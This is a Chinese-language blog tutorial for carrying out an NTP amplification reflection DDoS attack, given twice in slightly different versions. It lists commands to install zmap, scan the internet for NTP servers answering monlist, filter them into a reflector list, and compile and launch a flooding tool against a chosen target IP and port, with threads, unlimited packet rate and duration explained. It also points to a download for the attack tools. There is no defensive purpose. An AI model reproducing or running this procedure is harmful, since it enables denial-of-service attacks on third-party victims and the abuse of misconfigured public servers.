阿虎爱分享

 

NTP放大反射攻擊掃描列表教程

搬瓦工注册链接:精品稳定服务器购买

更新您的服务器
yum -y update

安装repositorys

CentOS 6:
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm

Centos 7:
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-8.noarch.rpm
sudo rpm -Uvh epel-release-7-5.noarch.rpm

安装依赖环境
yum install gcc libcap  libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c

安装ZMAP
yum -y install zmap


ntpchecker—上传到你的服务器
ntp_123_monlist.pkt—上传到你的服务器

开始扫描放大列表
screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
这个过程相当长的请等待。

给ntpchecker权限
chmod 777 ntpchecker

运行检查
screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1

过滤列表
awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt



编译与攻击


服务器终端和类型
yum install gcc libcap libpcap libpcap-devel 

编译脚本
gcc -lpthread ntp.c -lpcap -o ntp 

./ntp 127.0.0.1 80 ntpamp.txt 1500 -1 100

攻击命令解释
127.0.0.1=目标IP
80=攻击端口
ntpamp.txt=过滤后的放大列表
1500=线程
-1=pps限制,-1表示无限制
100=攻击时间











1.升級所有包,改變軟體設定和系統設定,系統版本核心都升級
yum -y update
2.下載rpm包(區分centos6 與centos7 執行不同的命令)
centos6:
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
centos7:
wget http://mirror.centos.org/centos/7/extras/x86_64/Packages/epel-release-7-11.noarch.rpm
sudo rpm -Uvh epel-release-7-11.noarch.rpm
3.安裝必要的依賴環境
yum install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c
--------------------------------------------掃描過濾列表-----------------------------------------------
4.安裝Zmap
wget https://github.com/zmap/zmap/archive/v1.0.3.tar.gz
tar -zxvf v1.0.3.tar.gz  
cd /root/zmap-1.0.3
cd src/
make
make install
ZMap安裝完成,可以執行如下命令測試:

zmap -p 80 -N 10 -B 1M -o -   #很快,程式會輸出10個Internet上打開了80埠的主機的IP,你也可以換成22埠23埠試試。具體的用法可以參考ZMap官方文件。
5.開始掃描NTP放大列表
screen zmap -p 123 -M udp --probe-args=file:/root/ntp_123_monlist.pkt -o monlist_fingerprint.txt
如果在掃描時,你與伺服器的會話不小心中斷。
你可以重新連線伺服器。
使用命令screen -r回到會話。
screen是將程式獨立執行在後臺,直到執行完成。
6.過濾列表
chmod 777 ntpchecker #新增許可權

screen ./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1 #執行檢查

awk '$2>419{print $1}' step1.txt | sort -n | uniq | sort -R > ntpamp.txt #過濾列表
--------------------------------------------放大攻擊-----------------------------------------------
工具下載至本文:https://www.cnblogs.com/a1d4m/p/10051969.html
7.攻擊命令
chmod 777 ntp #賦予許可權
./ntp 127.0.0.1 80 ntpamp.txt 100 -1 100

搬瓦工注册链接:精品稳定服务器购买

未经允许不得转载:阿虎爱分享----致力于分享各种免费资源 > NTP放大反射攻擊掃描列表教程

评论

留言与评论(共有 0 条评论)
   
验证码: